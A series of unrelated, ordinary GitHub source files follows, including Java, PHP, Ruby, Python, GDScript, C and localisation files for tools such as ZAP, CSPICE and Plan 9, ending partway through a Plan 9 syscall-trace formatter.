recolour: "../sprites/ride_shops/toilet/64p_000{seq(1..4,1)}.png";
x_offset: -33; y_offset: -33; width: 64; height: 64;
}
recolour {
original: grey;
replace: bitset(pink, orange, green_brown, orange_brown, yellow, light_green, green,
pink_brown, blue, jade_green, purple, red, sea_green, grey);
}
flags: bitset(se_entrance);
cost_item1: 100;
cost_item2: 0;
cost_ownership: 0;
cost_opened: 50;
type_item1: toilet;
type_item2: 0;
texts: strings { key: "toilet"; }
}
}
| {
"pile_set_name": "Github"
} |
package com.sample.playground;
public class Main{
public static void main(String[] args) {
Heater heater = new SuperHeater();
Pump punm = new Thermosiphon(heater);
CoffeeBox box = new CoffeeBox();
CoffeeMaker maker = new CoffeeMaker(heater,punm,box);
Cup cup = maker.brew(new Cup());
System.out.println("a "+(cup.isEmpty()?"empty":"full") + " cup of "+cup.getCoffee());
}
} | {
"pile_set_name": "Github"
} |
<p q="Just my ¢2" />
| {
"pile_set_name": "Github"
} |
#X-Generator: crowdin.com
# This file defines the default (English) variants of all of the internationalised messages
formhandler.options.title=Form Handler
formhandler.options.desc=This extension allows a user to change the default values used by ZAP Spiders.
formhandler.options.label.description=<html> <body> This Form Handler extension allows for the custom configuration of values used in forms based on field names. Newly created field names must match the field name in the form being processed. The field name inputed is not case sensitive, however the values are and will be reflected in the POST form. If only a field name is provided then an empty string will be used as a value. If a form's field does not match any defined in the extension then it will be passed to the Default Value Generator, which may not provide proper values. </body> </html>
formhandler.options.table.column.enabled=\u09b8\u0995\u09cd\u09b7\u09ae
formhandler.options.table.column.field=Field Name
formhandler.options.table.column.value=Value
formhandler.options.dialog.field.field.label.name=Name\:
formhandler.options.dialog.field.field.label.value=Value\:
formhandler.options.dialog.field.field.label.enabled=Enabled\:
formhandler.options.dialog.field.warning.name.repeated.title=Duplicated Field Name
formhandler.options.dialog.field.warning.name.repeated.text=A field with the given field name already exists
formhandler.options.dialog.field.add.title=Add A New Field Name And Value
formhandler.options.dialog.field.add.button.confirm=Add
formhandler.options.dialog.field.modify.title=Modify A Field
formhandler.options.dialog.field.modify.button.confirm=Modify
formhandler.options.dialog.field.remove.title=Remove A Field
formhandler.options.dialog.field.remove.text=Are you sure you want to remove the selected field.
formhandler.options.dialog.field.remove.checkbox.label=Do not show this message again
formhandler.options.dialog.field.remove.button.confirm=Remove
formhandler.options.dialog.field.remove.button.cancel=\u09ac\u09be\u09a4\u09bf\u09b2
| {
"pile_set_name": "Github"
} |
<template name="announcementRejectionPetition">
<h3>否決連署</h3>
<div class="row p-2">
<div class="col-12 col-md-6 my-2">
<h4>連署資訊</h4>
<div class="my-2">
{{#if isVoided}}
<span class="text-nowrap text-warning"><i class="fa fa-warning"></i> 公告已作廢,連署中止</span>
{{else if isPassed}}
<span class="text-nowrap text-success"><i class="fa fa-check"></i> 連署已通過(於 {{formatDateTimeText petition.passedAt}})</span>
{{else if isOverdue}}
<span class="text-nowrap text-danger"><i class="fa fa-times"></i> 已截止,連署未通過</span>
{{else}}
<span class="text-nowrap text-info"><i class="fa fa-pencil"></i> 連署進行中(尚餘 {{formatLongDurationTimeText remainingTime}})</span>
{{/if}}
</div>
<div class="my-2">
截止時間:{{formatDateTimeText petition.dueAt}} <br/>
連署門檻:{{threshold}} 人(活躍玩家 {{petition.activeUserCount}} 人中的 {{petition.thresholdPercent}}%) <br/>
目前連署人數:{{signerCount}} 人
</div>
{{#if canSign}}
<button class="btn btn-sm btn-warning m-1" data-action="signRejectionPetition">連署支持本次否決</button>
{{/if}}
</div>
<div class="col-12 col-md-6 my-2">
<h4>支持否決名單</h4>
<ol style="max-height: 300px; overflow-y: auto">
{{#each userId in petition.signers}}
<li>{{> userLink userId }}</li>
{{else}}
<em>裡面什麼都沒有呢…</em>
{{/each}}
</ol>
</div>
</div>
</template>
| {
"pile_set_name": "Github"
} |
extends Node
# This class contains controls that should always be accessible, like pausing
# the game or toggling the window full-screen.
# The "_" prefix is a convention to indicate that variables are private,
# that is to say, another node or script should not access them.
onready var _pause_menu = $InterfaceLayer/PauseMenu
func _init():
OS.min_window_size = OS.window_size
OS.max_window_size = OS.get_screen_size()
func _notification(what):
if what == NOTIFICATION_WM_QUIT_REQUEST:
# We need to clean up a little bit first to avoid Viewport errors.
if name == "Splitscreen":
$Black/SplitContainer/ViewportContainer1.free()
$Black.queue_free()
func _unhandled_input(event):
if event.is_action_pressed("toggle_fullscreen"):
OS.window_fullscreen = not OS.window_fullscreen
get_tree().set_input_as_handled()
# The GlobalControls node, in the Stage scene, is set to process even
# when the game is paused, so this code keeps running.
# To see that, select GlobalControls, and scroll down to the Pause category
# in the inspector.
elif event.is_action_pressed("toggle_pause"):
var tree = get_tree()
tree.paused = not tree.paused
if tree.paused:
_pause_menu.open()
else:
_pause_menu.close()
get_tree().set_input_as_handled()
elif event.is_action_pressed("splitscreen"):
if name == "Splitscreen":
# We need to clean up a little bit first to avoid Viewport errors.
$Black/SplitContainer/ViewportContainer1.free()
$Black.queue_free()
# warning-ignore:return_value_discarded
get_tree().change_scene("res://src/Main/Game.tscn")
else:
# warning-ignore:return_value_discarded
get_tree().change_scene("res://src/Main/Splitscreen.tscn")
| {
"pile_set_name": "Github"
} |
<?php
/*
* This file is part of the WouterJEloquentBundle package.
*
* (c) 2014 Wouter de Jong
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace WouterJ\EloquentBundle\Command;
use Illuminate\Console\OutputStyle;
use Symfony\Bridge\PhpUnit\SetUpTearDownTrait;
use Symfony\Component\Console\Application;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Helper\HelperSet;
use Symfony\Component\Console\Input\ArrayInput;
use Symfony\Component\Console\Input\InputDefinition;
use Symfony\Component\DependencyInjection\Container;
use Symfony\Component\DependencyInjection\ContainerInterface;
use WouterJ\EloquentBundle\Migrations\Migrator;
use PHPUnit\Framework\TestCase;
use Prophecy\Argument;
/**
* @author Wouter J <[email protected]>
*/
class MigrateCommandTest extends TestCase
{
use SetUpTearDownTrait;
private $migrator;
protected function doSetUp()
{
$this->migrator = $this->prophesize(Migrator::class);
if (method_exists(Migrator::class, 'getNotes')) {
$this->migrator->getNotes()->willReturn([]);
} else {
$this->migrator->setOutput(Argument::type(OutputStyle::class))->willReturn();
}
$this->migrator->paths()->willReturn([]);
}
/** @test */
public function it_asks_for_confirmation_in_prod()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'prod');
$this->migrator->run(Argument::cetera())->shouldNotBeCalled();
TestCommand::create($command)
->answering("no")
->duringExecute()
->outputs('Are you sure you want to execute the migrations in production?');
}
/** @test */
public function it_does_not_ask_for_confirmation_in_dev()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::cetera())->shouldBeCalled();
TestCommand::create($command)
->execute()
->doesNotOutput('Are you sure you want to execute the migrations in production?');
}
/** @test */
public function it_always_continues_when_force_is_passed()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'prod');
$this->migrator->run(Argument::cetera())->shouldBeCalled();
TestCommand::create($command)
->passing('--force')
->duringExecute()
->doesNotOutput('Are you sure you want to execute the migrations in production?');
}
/** @test */
public function it_uses_the_default_migration_path()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run([__DIR__.'/migrations'], Argument::cetera())->shouldBeCalled();
TestCommand::create($command)->execute();
}
/** @test */
public function it_allows_to_specify_another_path()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run([getcwd().'/db'], Argument::cetera())->shouldBeCalled();
TestCommand::create($command)->passing('--path', 'db')->duringExecute();
}
/** @test */
public function it_allows_multiple_migration_directories()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->paths()->willReturn(['/somewhere/migrations']);
$this->migrator->run([__DIR__.'/migrations', '/somewhere/migrations'], Argument::cetera())->shouldBeCalled();
TestCommand::create($command)->execute();
}
/** @test */
public function it_allows_batching_migrations_one_by_one()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::any(), ['pretend' => false, 'step' => true])->shouldBeCalled();
TestCommand::create($command)->passing('--step')->duringExecute();
}
/** @test */
public function it_can_pretend_migrations_were_run()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::any(), ['pretend' => true, 'step' => false])->shouldBeCalled();
TestCommand::create($command)->passing('--pretend')->duringExecute();
}
/** @test */
public function it_seeds_after_migrations_when_seed_is_passed()
{
$command = new MigrateCommand($this->migrator->reveal(), __DIR__.'/migrations', 'dev');
$this->migrator->run(Argument::cetera())->shouldBeCalled();
$seedCommand = $this->prophesize(Command::class);
$seedCommand->run(Argument::type(ArrayInput::class), Argument::any())->shouldBeCalled();
$app = $this->prophesize(Application::class);
$app->getHelperSet()->willReturn(new HelperSet());
$app->getDefinition()->willReturn(new InputDefinition());
$app->find('eloquent:seed')->willReturn($seedCommand->reveal());
$command->setApplication($app->reveal());
TestCommand::create($command)->passing('--seed')->duringExecute();
}
}
| {
"pile_set_name": "Github"
} |
require 'spec_helper'
describe "c" do
it "1" do
end
it "2" do
end
end
describe "d" do
it "3" do
end
it "4" do
end
end
class LineNumberQuerySubject
end
describe LineNumberQuerySubject do
it "5" do
end
end
describe LineNumberQuerySubject, "described" do
it "6" do
end
end
describe LineNumberQuerySubject, "described", :something => :something_else do
it "7" do
end
end
describe "described", :something => :something_else do
it "8" do
end
end
describe "e" do
it "9" do
end
it "10" do
end
describe "f" do
it "11" do
end
it "12" do
end
end
end
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipaySocialBaseGroupCreateResponse(AlipayResponse):
def __init__(self):
super(AlipaySocialBaseGroupCreateResponse, self).__init__()
self._group_id = None
@property
def group_id(self):
return self._group_id
@group_id.setter
def group_id(self, value):
self._group_id = value
def parse_response_content(self, response_content):
response = super(AlipaySocialBaseGroupCreateResponse, self).parse_response_content(response_content)
if 'group_id' in response:
self.group_id = response['group_id']
| {
"pile_set_name": "Github"
} |
const columns = generateColumns(10)
const data = generateData(columns, 200)
const Container = styled.div`
width: calc(50vw + 220px);
height: 50vh;
`
const Hint = styled.div`
font-size: 16px;
font-weight: 700;
color: #336699;
margin-bottom: 10px;
`
export default () => (
<>
<Hint>Resize your browser and see</Hint>
<Container>
<AutoResizer>
{({ width, height }) => (
<BaseTable
width={width}
height={height}
columns={columns}
data={data}
/>
)}
</AutoResizer>
</Container>
</>
)
| {
"pile_set_name": "Github"
} |
/*
-Procedure elemi_c ( Element of an integer set )
-Abstract
Determine whether an item is an element of an integer set.
-Disclaimer
THIS SOFTWARE AND ANY RELATED MATERIALS WERE CREATED BY THE
CALIFORNIA INSTITUTE OF TECHNOLOGY (CALTECH) UNDER A U.S.
GOVERNMENT CONTRACT WITH THE NATIONAL AERONAUTICS AND SPACE
ADMINISTRATION (NASA). THE SOFTWARE IS TECHNOLOGY AND SOFTWARE
PUBLICLY AVAILABLE UNDER U.S. EXPORT LAWS AND IS PROVIDED "AS-IS"
TO THE RECIPIENT WITHOUT WARRANTY OF ANY KIND, INCLUDING ANY
WARRANTIES OF PERFORMANCE OR MERCHANTABILITY OR FITNESS FOR A
PARTICULAR USE OR PURPOSE (AS SET FORTH IN UNITED STATES UCC
SECTIONS 2312-2313) OR FOR ANY PURPOSE WHATSOEVER, FOR THE
SOFTWARE AND RELATED MATERIALS, HOWEVER USED.
IN NO EVENT SHALL CALTECH, ITS JET PROPULSION LABORATORY, OR NASA
BE LIABLE FOR ANY DAMAGES AND/OR COSTS, INCLUDING, BUT NOT
LIMITED TO, INCIDENTAL OR CONSEQUENTIAL DAMAGES OF ANY KIND,
INCLUDING ECONOMIC DAMAGE OR INJURY TO PROPERTY AND LOST PROFITS,
REGARDLESS OF WHETHER CALTECH, JPL, OR NASA BE ADVISED, HAVE
REASON TO KNOW, OR, IN FACT, SHALL KNOW OF THE POSSIBILITY.
RECIPIENT BEARS ALL RISK RELATING TO QUALITY AND PERFORMANCE OF
THE SOFTWARE AND ANY RELATED MATERIALS, AND AGREES TO INDEMNIFY
CALTECH AND NASA FOR ALL THIRD-PARTY CLAIMS RESULTING FROM THE
ACTIONS OF RECIPIENT IN THE USE OF THE SOFTWARE.
-Required_Reading
SETS
-Keywords
CELLS, SETS
*/
#include "SpiceUsr.h"
#include "SpiceZfc.h"
#include "SpiceZmc.h"
SpiceBoolean elemi_c ( SpiceInt item,
SpiceCell * set )
/*
-Brief_I/O
VARIABLE I/O DESCRIPTION
-------- --- --------------------------------------------------
item I Item to be tested.
set I Set to be tested.
The function returns SPICETRUE if item is an element of set.
-Detailed_Input
item is an item which may or may not be an element of
the input set.
set is a CSPICE set. set must be declared as an integer
SpiceCell.
-Detailed_Output
The function returns SPICETRUE if item is a member of the set,
and returns SPICEFALSE otherwise.
-Parameters
None.
-Exceptions
1) If the input set argument does not qualify as a CSPICE set,
the error SPICE(NOTASET) will be signaled. CSPICE sets have
their data elements sorted in increasing order and contain
no duplicate data elements.
2) If the input set does not have integer data type, the error
SPICE(TYPEMISMATCH will be signaled.
-Files
None.
-Particulars
This routine uses a binary search to check for the presence in the set
of the specified item.
-Examples
Let set contain the elements
{ -1, 0, 1, 3, 5 }
The the following expressions have the value SPICETRUE
elemi_c ( -1, &set )
elemi_c ( 0, &set )
elemi_c ( 3, &set )
and the following expressions have the value SPICEFALSE
elemi_c ( -2, &set )
elemi_c ( 2, &set )
elemi_c ( 6, &set )
-Restrictions
None.
-Literature_References
None.
-Author_and_Institution
N.J. Bachman (JPL)
C.A. Curzon (JPL)
H.A. Neilan (JPL)
W.L. Taber (JPL)
I.M. Underwood (JPL)
-Version
-CSPICE Version 1.0.0, 07-AUG-2002 (NJB) (CAC) (HAN) (WLT) (IMU)
-Index_Entries
element of an integer set
-&
*/
{
/*
Use discovery check-in.
Make sure we're working with an integer cell.
*/
CELLTYPECHK_VAL ( CHK_DISCOVER, "elemi_c", SPICE_INT, set, SPICEFALSE );
/*
Make sure the input cell is a set.
*/
CELLISSETCHK_VAL ( CHK_DISCOVER, "elemi_c", set, SPICEFALSE );
/*
Initialize the set if necessary.
*/
CELLINIT ( set );
/*
The routine bsrchi_c returns the index of the item in the set,
or -1 if the item is not present.
*/
return ( ( SpiceBoolean )
( bsrchi_c ( item, set->card, set->data ) != -1 ) );
}
| {
"pile_set_name": "Github"
} |
#include "widgets/grid_item.h"
#include "gtest/gtest.h"
TEST(GridItem, cast) {
widget_t* w = grid_item_create(NULL, 10, 20, 30, 40);
ASSERT_EQ(w, grid_item_cast(w));
widget_destroy(w);
}
| {
"pile_set_name": "Github"
} |
// Copyright 2013 Square, Inc.
package org.assertj.android.api.hardware;
import android.annotation.TargetApi;
import android.hardware.Sensor;
import org.assertj.core.api.AbstractAssert;
import static android.hardware.Sensor.TYPE_ACCELEROMETER;
import static android.hardware.Sensor.TYPE_ALL;
import static android.hardware.Sensor.TYPE_AMBIENT_TEMPERATURE;
import static android.hardware.Sensor.TYPE_GAME_ROTATION_VECTOR;
import static android.hardware.Sensor.TYPE_GEOMAGNETIC_ROTATION_VECTOR;
import static android.hardware.Sensor.TYPE_GRAVITY;
import static android.hardware.Sensor.TYPE_GYROSCOPE;
import static android.hardware.Sensor.TYPE_GYROSCOPE_UNCALIBRATED;
import static android.hardware.Sensor.TYPE_HEART_RATE;
import static android.hardware.Sensor.TYPE_LIGHT;
import static android.hardware.Sensor.TYPE_LINEAR_ACCELERATION;
import static android.hardware.Sensor.TYPE_MAGNETIC_FIELD;
import static android.hardware.Sensor.TYPE_MAGNETIC_FIELD_UNCALIBRATED;
import static android.hardware.Sensor.TYPE_ORIENTATION;
import static android.hardware.Sensor.TYPE_PRESSURE;
import static android.hardware.Sensor.TYPE_PROXIMITY;
import static android.hardware.Sensor.TYPE_RELATIVE_HUMIDITY;
import static android.hardware.Sensor.TYPE_ROTATION_VECTOR;
import static android.hardware.Sensor.TYPE_SIGNIFICANT_MOTION;
import static android.hardware.Sensor.TYPE_STEP_COUNTER;
import static android.hardware.Sensor.TYPE_STEP_DETECTOR;
import static android.hardware.Sensor.TYPE_TEMPERATURE;
import static android.os.Build.VERSION_CODES.GINGERBREAD;
import static android.os.Build.VERSION_CODES.KITKAT;
import static org.assertj.android.internal.BitmaskUtils.buildNamedValueString;
import static org.assertj.core.api.Assertions.assertThat;
/** Assertions for {@link Sensor} instances. */
public class SensorAssert extends AbstractAssert<SensorAssert, Sensor> {
public SensorAssert(Sensor actual) {
super(actual, SensorAssert.class);
}
public SensorAssert hasMaximumRange(float range) {
isNotNull();
float actualRange = actual.getMaximumRange();
assertThat(actualRange) //
.overridingErrorMessage("Expected maximum range <%s> but was <%s>.", range, actualRange) //
.isEqualTo(range);
return this;
}
@TargetApi(GINGERBREAD)
public SensorAssert hasMinDelay(int delay) {
isNotNull();
int actualDelay = actual.getMinDelay();
assertThat(actualDelay) //
.overridingErrorMessage("Expected minimum delay <%s> but was <%s>.", delay, actualDelay) //
.isEqualTo(delay);
return this;
}
public SensorAssert hasName(String name) {
isNotNull();
String actualName = actual.getName();
assertThat(actualName) //
.overridingErrorMessage("Expected name <%s> but was <%s>.", name, actualName) //
.isEqualTo(name);
return this;
}
public SensorAssert hasPower(float power) {
isNotNull();
float actualPower = actual.getPower();
assertThat(actualPower) //
.overridingErrorMessage("Expected power <%s> but was <%s>.", power, actualPower) //
.isEqualTo(power);
return this;
}
public SensorAssert hasResolution(float resolution) {
isNotNull();
float actualResolution = actual.getResolution();
assertThat(actualResolution) //
.overridingErrorMessage("Expected resolution <%s> but was <%s>.", resolution,
actualResolution) //
.isEqualTo(resolution);
return this;
}
public SensorAssert hasType(@SensorType int type) {
isNotNull();
int actualType = actual.getType();
//noinspection ResourceType
assertThat(actualType) //
.overridingErrorMessage("Expected type <%s> but was <%s>.", typeToString(type),
typeToString(actualType)) //
.isEqualTo(type);
return this;
}
public SensorAssert hasVendor(String vendor) {
isNotNull();
String actualVendor = actual.getVendor();
assertThat(actualVendor) //
.overridingErrorMessage("Expected vendor <%s> but was <%s>.", vendor, actualVendor) //
.isEqualTo(vendor);
return this;
}
public SensorAssert hasVersion(int version) {
isNotNull();
int actualVersion = actual.getVersion();
assertThat(actualVersion) //
.overridingErrorMessage("Expected version <%s> but was <%s>.", version, actualVersion) //
.isEqualTo(version);
return this;
}
@TargetApi(KITKAT)
public SensorAssert hasFifoMaxEventCount(float count) {
isNotNull();
float actualCount = actual.getFifoMaxEventCount();
assertThat(actualCount) //
.overridingErrorMessage("Expected max event count to be <%s> but was <%s>.", count,
actualCount) //
.isEqualTo(count);
return this;
}
@TargetApi(KITKAT)
public SensorAssert hasFifoReservedEventCount(float count) {
isNotNull();
float actualCount = actual.getFifoReservedEventCount();
assertThat(actualCount) //
.overridingErrorMessage("Expected reserved event count to be <%s> but was <%s>.", count,
actualCount) //
.isEqualTo(count);
return this;
}
public static String typeToString(@SensorType int type) {
return buildNamedValueString(type) //
.value(TYPE_ACCELEROMETER, "accelerometer")
.value(TYPE_ALL, "all")
.value(TYPE_AMBIENT_TEMPERATURE, "ambient_temperature")
.value(TYPE_GAME_ROTATION_VECTOR, "game_rotation_vector")
.value(TYPE_GEOMAGNETIC_ROTATION_VECTOR, "geomagnetic_rotation_vector")
.value(TYPE_GRAVITY, "gravity")
.value(TYPE_GYROSCOPE, "gyroscope")
.value(TYPE_GYROSCOPE_UNCALIBRATED, "gyroscope_uncalibrated")
.value(TYPE_HEART_RATE, "heart_rate")
.value(TYPE_LIGHT, "light")
.value(TYPE_LINEAR_ACCELERATION, "linear_acceleration")
.value(TYPE_MAGNETIC_FIELD, "magnetic_field")
.value(TYPE_MAGNETIC_FIELD_UNCALIBRATED, "magnetic_field_uncalibrated")
.value(TYPE_ORIENTATION, "orientation")
.value(TYPE_PRESSURE, "pressure")
.value(TYPE_PROXIMITY, "proximity")
.value(TYPE_RELATIVE_HUMIDITY, "relative_humidity")
.value(TYPE_ROTATION_VECTOR, "rotation_vector")
.value(TYPE_SIGNIFICANT_MOTION, "significant_motion")
.value(TYPE_STEP_COUNTER, "step_counter")
.value(TYPE_STEP_DETECTOR, "step_detector")
.value(TYPE_TEMPERATURE, "temperature")
.get();
}
}
| {
"pile_set_name": "Github"
} |
## team.members
### summary
read member list of the team
### method
GET
### route
> /v2/teams/:_id/members
### params
<table>
<thead>
<tr>
<th>key</th>
<th>type</th>
<th>required</th>
<th>description</th>
</tr>
</thead>
<tbody>
<tr>
<td>_id</td>
<td>String(ObjectId|InUrl)</td>
<td>true</td>
<td>team id</td>
</tr>
</tbody>
</table>
### request
```
GET /v2/teams/536c834d26faf71918b774ed/members HTTP/1.1
```
### response
```json
[
{
"_id": "54d98ef83c0b3ada1c4ccf78",
"name": "dajiangyou2",
"pinyin": "dajiangyou2",
"email": "[email protected]",
"__v": 0,
"globalRole": "user",
"isRobot": false,
"pinyins": [
"dajiangyou2"
],
"from": "register",
"updatedAt": "2015-02-10T04:54:16.218Z",
"createdAt": "2015-02-10T04:54:16.218Z",
"source": "teambition",
"avatarUrl": "null",
"id": "54d98ef83c0b3ada1c4ccf78",
"role": "owner"
},
{
"_id": "54d98ef83c0b3ada1c4ccf77",
"name": "dajiangyou1",
"pinyin": "dajiangyou1",
"email": "[email protected]",
"__v": 0,
"globalRole": "user",
"isRobot": false,
"pinyins": [
"dajiangyou1"
],
"from": "register",
"updatedAt": "2015-02-10T04:54:16.217Z",
"createdAt": "2015-02-10T04:54:16.217Z",
"source": "teambition",
"avatarUrl": "null",
"id": "54d98ef83c0b3ada1c4ccf77",
"role": "owner"
},
{
"_id": "54d98ef83c0b3ada1c4ccf77",
"name": "dajiangyou1",
"pinyin": "dajiangyou1",
"email": "[email protected]",
"__v": 0,
"globalRole": "user",
"isRobot": false,
"pinyins": [
"dajiangyou1"
],
"from": "register",
"updatedAt": "2015-02-10T04:54:16.217Z",
"createdAt": "2015-02-10T04:54:16.217Z",
"source": "teambition",
"avatarUrl": "null",
"id": "54d98ef83c0b3ada1c4ccf77",
"role": "owner"
}
]
```
| {
"pile_set_name": "Github"
} |
/*
* This file is part of the UCB release of Plan 9. It is subject to the license
* terms in the LICENSE file found in the top-level directory of this
* distribution and at http://akaros.cs.berkeley.edu/files/Plan9License. No
* part of the UCB release of Plan 9, including this file, may be copied,
* modified, propagated, or distributed except according to the terms contained
* in the LICENSE file.
*/
#include "u.h"
#include "../port/lib.h"
#include "mem.h"
#include "dat.h"
#include "fns.h"
#include "sys.h"
/*
* Print functions for system call tracing.
*/
static void
fmtrwdata(Fmt* f, char* a, int n, char* suffix)
{
int i;
char *t;
if(a == nil){
fmtprint(f, "0x0%s", suffix);
return;
}
if(!okaddr((uintptr_t)a, n, 0)){
fmtprint(f, "(BAD %p)%s", a, suffix);
return;
}
a = validaddr(a, n, 0);
t = smalloc(n+1);
for(i = 0; i < n; i++){
if(a[i] > 0x20 && a[i] < 0x7f)
t[i] = a[i];
else
t[i] = '.';
}
fmtprint(f, " %#P/\"%s\"%s", a, t, suffix);
free(t);
}
static void
fmtuserstring(Fmt* f, char* a, char* suffix)
{
int len;
char *t;
if(a == nil){
fmtprint(f, "0/\"\"%s", suffix);
return;
}
a = validaddr(a, 1, 0);
len = ((char*)vmemchr(a, 0, 0x7fffffff) - a);
t = smalloc(len+1);
memmove(t, a, len);
t[len] = 0;
fmtprint(f, "%#p/\"%s\"%s", a, t, suffix);
free(t);
}
/*
*/
void
syscallfmt(uint8_t what, int syscallno, Ar0 *ar0, uint64_t start, uint64_t stop, ...)
{
Proc *up = externup();
void *errstr = nil;
va_list list;
int32_t l;
Fmt fmt;
void *v;
int64_t vl;
int i[2], len;
char *a, **argv;
va_start(list, stop);
fmtstrinit(&fmt);
fmtprint(&fmt, "%c %d %s ", what, up->pid, up->text);
if(syscallno > nsyscall)
fmtprint(&fmt, " %d ", syscallno);
else
fmtprint(&fmt, "%s ", systab[syscallno].n);
if(up->syscalltrace != nil)
free(up->syscalltrace);
up->syscalltrace = nil;
switch(syscallno){
case CHDIR:
case EXITS:
case REMOVE:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
break;
case BIND:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x", i[0]);
break;
case CLOSE:
case NOTED:
case SLEEP:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%d", i[0]);
break;
case DUP:
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %d", i[0], i[1]);
break;
case ALARM:
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#lu ", l);
break;
case EXEC:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
argv = va_arg(list, char**);
evenaddr(PTR2UINT(argv));
for(;;){
if (! okaddr((uintptr_t)argv, sizeof(char**), 0))
break;
a = *(char**)validaddr(argv, sizeof(char**), 0);
if(a == nil)
break;
fmtprint(&fmt, " ");
fmtuserstring(&fmt, a, "");
argv++;
}
break;
case FAUTH:
i[0] = va_arg(list, int);
a = va_arg(list, char*);
fmtprint(&fmt, "%d", i[0]);
fmtuserstring(&fmt, a, "");
break;
case SEGBRK:
case RENDEZVOUS:
v = va_arg(list, void*);
fmtprint(&fmt, "%#p ", v);
v = va_arg(list, void*);
fmtprint(&fmt, "%#p", v);
break;
case OPEN:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x", i[0]);
break;
case RFORK:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x", i[0]);
break;
case PIPE:
case BRK_:
v = va_arg(list, int*);
fmtprint(&fmt, "%#p", v);
break;
case CREATE:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%#x %#x", i[0], i[1]);
break;
case FD2PATH:
case FSTAT:
case FWSTAT:
i[0] = va_arg(list, int);
a = va_arg(list, char*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%d %#p %lu", i[0], a, l);
break;
case NOTIFY:
case SEGDETACH:
v = va_arg(list, void*);
fmtprint(&fmt, "%#p", v);
break;
case SEGATTACH:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%d ", i[0]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
/*FALLTHROUGH*/
case SEGFREE:
case SEGFLUSH:
v = va_arg(list, void*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#p %lu", v, l);
break;
case UNMOUNT:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
break;
case SEMACQUIRE:
case SEMRELEASE:
v = va_arg(list, int*);
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#p %d", v, i[0]);
break;
case TSEMACQUIRE:
v = va_arg(list, int*);
l = va_arg(list, uint32_t);
fmtprint(&fmt, "%#p %ld", v, l);
break;
case SEEK:
i[0] = va_arg(list, int);
vl = va_arg(list, int64_t);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %#llx %d", i[0], vl, i[1]);
break;
case FVERSION:
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %d ", i[0], i[1]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%lu", l);
break;
case WSTAT:
case STAT:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
v = va_arg(list, void*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#p %lu", v, l);
break;
case ERRSTR:
a = va_arg(list, char*);
l = va_arg(list, unsigned long);
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu", l);
break;
case AWAIT:
a = va_arg(list, char*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#p %lu", a, l);
break;
case MOUNT:
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %d ", i[0], i[1]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x ", i[0]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
break;
case PREAD:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%d ", i[0]);
v = va_arg(list, void*);
l = va_arg(list, int32_t);
vl = va_arg(list, int64_t);
if (what == 'E') {
fmtprint(&fmt, "%#P %ld 0x%llx", v, l, vl);
}
break;
case PWRITE:
i[0] = va_arg(list, int);
v = va_arg(list, void*);
l = va_arg(list, int32_t);
vl = va_arg(list, int64_t);
fmtprint(&fmt, "%d ", i[0]);
len = MIN(l, 64);
fmtrwdata(&fmt, v, len, " ");
fmtprint(&fmt, "%ld 0x%llx", l, vl);
break;
}
if (what == 'E') {
fmtprint(&fmt, "\n");
up->syscalltrace = fmtstrflush(&fmt);
return;
}
errstr = "\"\"";
switch(syscallno){
default:
if(ar0->i == -1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %d", ar0->i);
break;
case SEEK:
if(ar0->vl == -1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %lld", ar0->vl);
break;
case NSEC:
fmtprint(&fmt, " = %lld", ar0->vl);
break;
case ALARM:
case PWRITE:
if(ar0->l == -1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %ld", ar0->l);
break;
